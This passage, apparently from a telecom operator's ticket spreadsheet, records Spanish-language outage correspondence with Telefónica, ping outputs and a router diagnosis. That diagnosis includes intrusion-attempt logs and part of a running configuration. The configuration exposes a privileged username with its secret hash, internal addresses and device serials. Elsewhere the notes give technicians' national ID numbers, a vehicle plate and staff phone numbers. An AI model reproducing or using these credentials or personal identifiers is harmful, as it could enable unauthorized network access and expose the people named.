SIN EMBARGO EL PERSONAL TÉCNICO DE CAMPO ESTÁ TRABAJANDO EN ELLO CON APOYO DEL PERSONAL DE TRANSMISIÓN.
ESPERAMOS COMPARTIR MAS AVANCES A LA BREVEDAD POSIBLE.
SALUDOS.
DE: SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 02:43
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
BUENOS DÍAS,
¿PUEDEN COMPARTIR AVANCES?
¿DISPONEMOS DE ETR PARA EL CAMBIO DE TARJETA?
GRACIAS, UN SALUDO.
SUSANA FRANCO GALINDO</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL INDICANDO AVANCES --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 05:19
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: PETICIÓN ESCALADO | RE: NEW INCIDENT // TELEFONICA DATACORP // GUATEMALA // CID:C-0022700202 // TT:INC000003789251 // TOTAL ISOLATION
BUENOS DÍAS ESTIMADO SR. VASQUEZ.
                ACTUALMENTE LA FALLA GENERAL AÚN SE ENCUENTRA EN ETAPA DE TRABAJOS, DE MOMENTO NO CONTAMOS CON EL ETR PARA LA FINALIZACIÓN.
ESPERAMOS CONTAR CON MÁS AVANCES A LA BREVEDAD POSIBLE, ADICIONAL ADJUNTO CADENA DE CORREOS DONDE TAMBIÉN SE HA LLEVADO SEGUIMIENTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>***--- TELEFONICA CONSULTA AVANCES, SE RESPONDE CORREO --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 7 DE JULIO DE 2022 00:47
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
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 LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
BUENOS DÍAS ESTIMADO SR. OSORIO.
                RESPECTO A SU SOLICITUS, SE CONSULTAN AVANCES PARA LA FALLA GENERAL Y SE VALIDA QUE DE MOMENTO NO HAY NOVEDAD Y ESPERAMOS NOS ACTUALICEN MAS AVANCES EN EL HORARIO HABIL LOCAL.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: JUEVES, 7 DE JULIO DE 2022 00:38
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; MARIO MOYA ANDRES &lt;MARIO.MOYA@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
ESTIMADOS,
GRACIAS, ESTAREMOS ATENTOS A LAS NOVEDADES QUE COMPARTAN.
UN SALUDO,
HÉCTOR OSORIO</t>
  </si>
  <si>
    <t>***--- EL CLIENTE SOLICITA ETR YA QUE EL SERVICIO VOLVIO A CAER -**
DE: SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 04:55
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS,
EL CIRCUITO VUELVE A ESTAR CAÍDO, POR FAVOR NECESITAMOS SOLUCIONAR EL CASO LO ANTES POSIBLE.
¿DISPONEN DE AVANCES? ¿TENEMOS ETR?
GRACIAS, UN SALUDO.
SUSANA FRANCO GALINDO
CUSTOMER OP. &amp; TECH ¿ RECOVERY MANAGER NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS
FIX PHONE +34 91 055 34 41 | MOBILE +34 690 606 825
EMAIL SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM</t>
  </si>
  <si>
    <t>***-- SE RESPONDE CORREO A CL DE NUEVO Y SE INDICAN LOS AVANCES ACTUALES ---**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 02:11
PARA: SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS ESTIMADA SEÑORITA SUSANA.
                RESPECTO A SU SOLICITUD, ACTUALMENTE CONTINÚAN REALIZADO DIAGNÓSTICO DEL LADO DE EL SALVADOR, LOS COMPAÑEROS DE N1 CONTINÚAN PRESIONANDO PARA OBTENER ETR.
LAMENTAMOS LOS INCONVENIENTES, ESPERAMOS COMPARTIR LOS AVANCES Y EL ETR SOLICITADO A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 02:01
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS,
EL CIRCUITO CONTINÚA CAÍDO.
¿POR FAVOR PUEDEN COMPARTIR AVANCES? ¿DISPONEMOS DE ETR?
GRACIAS, UN SALUDO.
SUSANA FRANCO GALINDO
CUSTOMER OP. &amp; TECH ¿ RECOVERY MANAGER NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS
FIX PHONE +34 91 055 34 41 | MOBILE +34 690 606 825</t>
  </si>
  <si>
    <t>***--- CLIENTE INDICA QUE EL SERVIICO CAYO DE NUEVO --**  SE LE RESPONDE CORREO
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 03:13
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS ESTIMADO SR. OSORIO.
                PERSONAL A CARGO NOS INDICA QUE ACTUALMENTE UNA SE REALIZAN VERIFICACIONES DE LADO DE EL SALVADOR, POR LO QUE CONTINUAMOS A LA ESPERA DEL DIAGNÓSTICO DE ESE LADO.
LAMENTAMOS LOS INCONVENIENTES Y ESPERAMOS EL INCONVENIENTE SEA RESUELTO LO ANTES POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 02:53
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS,
EL SERVICIO HA CAÍDO NUEVAMENTE:
GRAGUATC5&gt; PING RAPID ROUTING-INSTANCE VPN_12956_10700 172.20.6.138
PING 172.20.6.138 (172.20.6.138): 56 DATA BYTES
.....
--- 172.20.6.138 PING STATISTICS ---
5 PACKETS TRANSMITTED, 0 PACKETS RECEIVED, 100% PACKET LOSS
ESTAREMOS ATENTOS A SUS COMENTARIOS.
GRACIAS Y SALUDOS,</t>
  </si>
  <si>
    <t>F4605973</t>
  </si>
  <si>
    <t xml:space="preserve">SE PROCEDE CON CIERRE DE TICKET PO PROBLEMA DE ENERGIA COMERCIA. YA QUE NO SE TIENE GESTION DEL EQUIPO CPE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN PRADO 10.152.168.186
  PING 10.152.168.186: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.168.186 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.49
DISPLAY IP ROUTING-TABLE VPN-INSTANCE PRADO 10.152.168.186
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : PRADO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.152.168.186/32  DIRECT  0    0                 0.0.0.0         VLANIF1168			</t>
  </si>
  <si>
    <t>F4606020</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE CON LA SIGUIENTE INFORMACIÓN, SE PIDE APOYO A CNOC CLARO VÍA SKYPE Y SE RESPONDE CORREO:
DE: LUIS LEON [MAILTO:LLEON@HIDROPV.COM]
ENVIADO EL: SÁBADO, 18 DE JUNIO DE 2022 15:07
ASUNTO: RE: ENLACE ROUTER CLARO POZA VERDE (DC RECICLADOS) (172.30.0.21) ISP: CLARO ID: 86100038 DOWN
BUEN DÍA, GUSTO DE SALUDARLES.
PERDÓN POR EL ATRASO EN MI RESPUESTA.
ENVIAR NOMBRES DE TÉCNICOS PARA SOLICITUD DE AUTORIZACIÓN DE INGRESO.
SALUDOS
LUIS LEÓN</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA GESTION DE ACCESOS
RE: ENLACE ROUTER CLARO POZA VERDE (DC RECICLADOS) (172.30.0.21) ISP: CLARO ID: 86100038 DOWN
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:CLIENTESCORPORATIVOS;LUIS LEON &lt;LLEON@HIDROPV.COM&gt;;WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;Y 3 MÁS
CC:TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;;ESTUARDO VILLATORO &lt;ESTUARDOV@INGRUP.COM&gt;Y 2 MÁS
SÁB 18/06/2022 16:57
BUENA  TARDE  ESTIMADO  CLIENTE ,
SOLICITANDO DE SU APOYO PARA GESTIONAR ACCESOS A NUESTRA AREA TECNICA
NOMBRE: BRIAN ROGELIO JOSIMAR CARRILLO ARGUETA IBM: 530027  DPI: 2215803950101
NOMBRE: LUIS FERNANDO LOPEZ SARCEÑO IBM: 633724 DPI: 1924248312217
MATIRCULA DEL VEHICULO: P-370GTW
QUEDO ATENTO A SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4606030</t>
  </si>
  <si>
    <t xml:space="preserve">SE REALIZAN DIGNOSTICO DONDE SE ENCUENTRA QUE EL EQUIPO A SIDO INTENTADO ENTRARLE IN PERMISOSO Y NO DEJA INGRESAR .
*JUN 16 23:26:41.334 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.152.141.51 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 03:01:00.572 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.219.100 - WRONG VERSION NUMBER
*JUN 17 06:44:22.836 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 06:44:34.809 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 07:49:09.130 GMT: %SSH-3-PACK_CORR_PAD: CORRUPTED PADLEN 0 ON INPUT
*JUN 17 07:54:35.166 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 61.177.173.35
*JUN 17 09:47:46.555 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:48:49.589 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:52:16.758 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.105.28.221
*JUN 17 10:34:00.733 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 10:34:00 GMT FRI JUN 17 2022
*JUN 17 10:34:02.490 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 2(190.148.15.206)
*JUN 17 11:23:45.928 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:23:54.230 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:53:01.193 GMT: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON OCT 28 08:04:04 2021 GMT
*JUN 17 12:36:25.389 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 12:36:32.275 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 14:59:13.059 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 14:59:13 GMT FRI JUN 17 2022
*JUN 17 14:59:13.612 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 1(190.148.15.206)
*JUN 17 23:49:20.274 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:49:32.250 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:50:56.934 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 10.152.0.82] [LOCALPORT: 23] AT 23:50:56 GMT FRI JUN 17 2022
ID1025035#
SHOW CLOCK
*23:51:13.439 GMT FRI JUN 17 2022
ID1025035#
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 1 DÍA.
CISCO IOS XE SOFTWARE, VERSION 16.12.04
CISCO IOS SOFTWARE [GIBRALTAR], ISR SOFTWARE (ARMV8EL_LINUX_IOSD-UNIVERSALK9-M), VERSION 16.12.4, RELEASE SOFTWARE (FC5)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2020 BY CISCO SYSTEMS, INC.
COMPILED THU 09-JUL-20 20:16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C)
ID1025035 UPTIME IS 1 DAY, 11 HOURS, 58 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 1 DAY, 11 HOURS, 59 MINUTES
SYSTEM RETURNED TO ROM BY POWERON
SYSTEM IMAGE FILE IS "BOOTFLASH:C1100-UNIVERSALK9.16.12.04.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UCK9             NONE             SMART LICENSE    NONE
SECURITYK9       NONE             SMART LICENSE    NONE
IPBASE           IPBASEK9         SMART LICENSE    IPBASEK9
THE CURRENT THROUGHPUT LEVEL IS UNTHROTTLED
SMART LICENSING STATUS: UNREGISTERED/NO LICENSES IN USE
CISCO C1111-4P (1RU) PROCESSOR WITH 1398091K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FGL2544M0A9
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2945023K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
ID1025035#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 8488 BYTES
!
! LAST CONFIGURATION CHANGE AT 11:58:53 GMT THU JUN 16 2022 BY T3LN0CR3D3S
!
VERSION 16.12
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME ID1025035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NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
!
IP DOMAIN NAME TELECOM.COM.SV
!
!
!
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-305154208
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-305154208
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-305154208
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-305154208
 CERTIFICATE SELF-SIGNED 01
  3082032E 30820216 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  30312E30 2C060355 04031325 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 33303531 35343230 38301E17 0D323230 36313630 33333435
  335A170D 33303031 30313030 30303030 5A303031 2E302C06 03550403 1325494F
  532D5365 6C662D53 69676E65 642D4365 72746966 69636174 652D3330 35313534
  32303830 82012230 0D06092A 864886F7 0D010101 05000382 010F0030 82010A02
  82010100 952E14FD 18F9C2F0 767BCA76 44B0057F FCF05131 BE938686 82C07369
  D13E408B 8B82C335 5B445441 F3FA4166 7F98DFB2 3D332DE8 D24D8186 3A4BEE03
  D6BAC431 C36D9328 47F6AF83 23A126C8 EC8C8FC6 E02B5892 B06D72E4 58436D33
  604130FD A6C6068D FF96CC67 314E0E8C DCA4EE6F 55C80FD4 167ABD65 B72B7F64
  0E72A931 59B2D891 1DAEBDB8 0705B0A5 1C374150 95EDB4FF 1DBAE0DE 84619947
  DD52117D 7A7E5E8B 29EF596E 730B67D8 2EC6E177 2D1F4020 0D370451 42871946
  DA6F83B9 49EC33ED 1D712823 941D61E3 E6B5B148 8ECAF7A5 F833C2B9 BAE5A7D7
  16088DE6 E809F6EA EF995E45 815614FA 04B63E6B 7E8244F1 0761500A 45DE35B7
  DF225797 02030100 01A35330 51300F06 03551D13 0101FF04 05300301 01FF301F
  0603551D 23041830 168014E7 4694AA79 4634CBE6 150E9906 615C7BE1 C1C63A30
  1D060355 1D0E0416 0414E746 94AA7946 34CBE615 0E990661 5C7BE1C1 C63A300D
  06092A86 4886F70D 01010505 00038201 01001628 1101C0AD 2B77833F A3E7C170
  B7C357A2 BB263EF1 B119E9E7 9E4D7CA4 B7FC8191 386B0468 2375384F 3E65B978
  9F50B48B BDEC878D C3DBB663 385A1895 22B820F7 A4299040 CF35BB73 E8676434
  9F4BAFF9 5AB57D1D BC3333EE 9CEE445F CD437396 0F021DFD C911CB75 A98A92D2
  ADB31330 0E209611 9F943224 982448FF BEADC7E6 9CFFE20C 2642FBDB E6CAB972
  C5241166 96401E92 721B52F4 DBE5DAE7 871D9B1F 7CCD3947 206E0D26 DBF3F36F
  7A2EAF31 4E8C4142 674957A2 74074765 23B3FCF1 5D8E2ED6 461D9E3A 7A738CEE
  C286A971 B6F74600 D764DD05 3969CD4A B0D3BCF9 A6E7BDE5 4164CDDD 91C80E73
  3C769B26 62B0FF42 ED096886 29ED0354 FC66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
LICENSE UDI PID C1111-4P SN FGL2544M0A9
MEMORY FREE LOW-WATERMARK PROCESSOR 70177
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 SECRET 9 $9$AAPXUS9A9BWRDE$26SVP56IL4HPVTVCEIUH9AOBZFD/JMXCT/SAMYAM2WS
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
NO CDP RUN
!
!
CLASS-MAP MATCH-ALL SERVICIOS_50M
 MATCH ANY
!
POLICY-MAP SERVICIOS_50M
 CLASS SERVICIOS_50M
  POLICE CIR 51200000 BC 9600000 BE 19200000 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP  VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.34.118 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
